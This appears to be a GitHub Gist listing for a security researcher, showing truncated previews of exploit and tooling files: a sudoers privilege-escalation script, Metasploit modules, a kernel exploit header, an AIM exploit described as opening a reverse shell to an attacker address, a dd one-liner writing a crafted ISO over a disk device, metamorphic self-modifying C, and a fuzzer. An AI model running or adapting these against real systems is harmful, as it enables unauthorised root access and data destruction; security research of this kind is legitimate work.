🔨
Probably breaking your code.

Mark Stealer Whitehall oxagast

@oxagast
oxagast / sudo-lolwut.log
Last active January 16, 2020 17:57
I'm pretty sure that shouldn't happen - sudo/useradd '#0'
root@debian-sid-testbed:/home/marshall/ansvif# useradd '#0'
root@debian-sid-testbed:/home/marshall/ansvif# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
@oxagast
oxagast / sudo_erroot.sh
Last active November 14, 2019 07:20
Write to /etc/sudoers using file descriptor 3 on sudo's process while asking for a pass
# oxagast / Marshall Whittaker
#
# The echo line uses sudoers file format to allow for everyone to
# use the root account and writes it to proc/23423/fd/3 (where
# the number is sudo's process). If you have write access to file
# descriptor 3 it gives you root!
# Caveats: sudo must be running asking for a password at the time.
# you must have write permission to 3.
#
# Race condition between when getting the uid of sudo and the
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/base/sessions/scriptable'
require 'msf/base'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
#!/bin/bash
#
# ./makeitrain.sh bitcoin-qt.crashdump.core
# __ _ _ __ ___ __ ____ ____
# / ( \/ )/ _\ / __)/ _\/ ___(_ )
# ( O ) (/ ( (_ / \___ \ )(
# \__(_/\_\_/\_/\___\_/\_(____/(__)
#
# Donations:
# btc: 34fDhMUkvGVr1s2jQvhwmBfw1xqjstrLed
@oxagast
oxagast / autopreter.pl
Last active November 24, 2020 17:18
Automatically generate a custom metasploit.rc resource targeted at an address.
#!/usr/bin/perl
use strict;
use Cwd qw();
my $path = Cwd::cwd();
if ( $path !~ m/metasploit/ ) {
print("err: Your current working directory must be metasploit's.\n");
exit(1);
}
print("autopreter by oxagast\n");
if ( $#ARGV < 1 ) {
genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd && dd if=dos.iso | sed -e 's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1
/* */
/* gcc drm_i915_ktsploit.c -o kt -ldrm -I/usr/include/libdrm */
/* exploit by oxagast */
/* */
//Jun 17 01:22:05 likon kernel: [ 1788.600973] BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
//Jun 17 01:22:05 likon kernel: [ 1788.600982] IP: __sg_alloc_table_from_pages+0xe4/0x1f0
//Jun 17 01:22:05 likon kernel: [ 1788.600984] PGD 0 P4D 0
//Jun 17 01:22:05 likon kernel: [ 1788.600987] Oops: 0000 [#3] SMP PTI
//Jun 17 01:22:05 likon kernel: [ 1788.600988] Modules linked in: rfcomm appletalk ipx p8023 psnap p8022 llc pci_stub vboxpci(OE) vboxnetadp(OE) vboxnetflt(OE) vboxdrv(OE) snd_hrtimer ccm cmac bnep binfmt_misc arc4 iwlmvm mac80211 hid_multitouch hid_sensor_magn_3d hid_sensor_accel_3d hid_sensor_rotation hid_sensor_incl_3d hid_sensor_als ir_lirc_codec lirc_dev hid_sensor_gyro_3d rtl2832_sdr hid_sensor_trigger industrialio_t
#!/bin/bash
### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.
### Leverages binary file planting to My Documents via AIMs advertisement code.
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.
### Marshall Whittaker
ATTACKER="192.168.2.10";
@oxagast
oxagast / myself.c
Last active February 10, 2019 18:05
#define __NULLHOLDER
#define __START
/* oxagast */
/* self output metamorphic c code */
/* gcc myself.c -o me && cat myself.c >> me */
/* ./me && md5sum ./me && sleep 1 && ./me && md5sum ./me */
/* d4c6f41bace586e876f31d8d5032bd2e ./me */
/* 9c80c85a49721a1700e0ac2f594bbf86 ./me */
#include <stdio.h>
#include <stdlib.h>
# bermise_fuzz
# oxagast
mupr="64";
syslog_crashes=$(grep "traps:\|segfault" /var/log/syslog -c);
binname="$1";
binshort=$(echo $binname | awk -F "/" '{print $NF}')
echo fuzzing $binname;
randchars=1;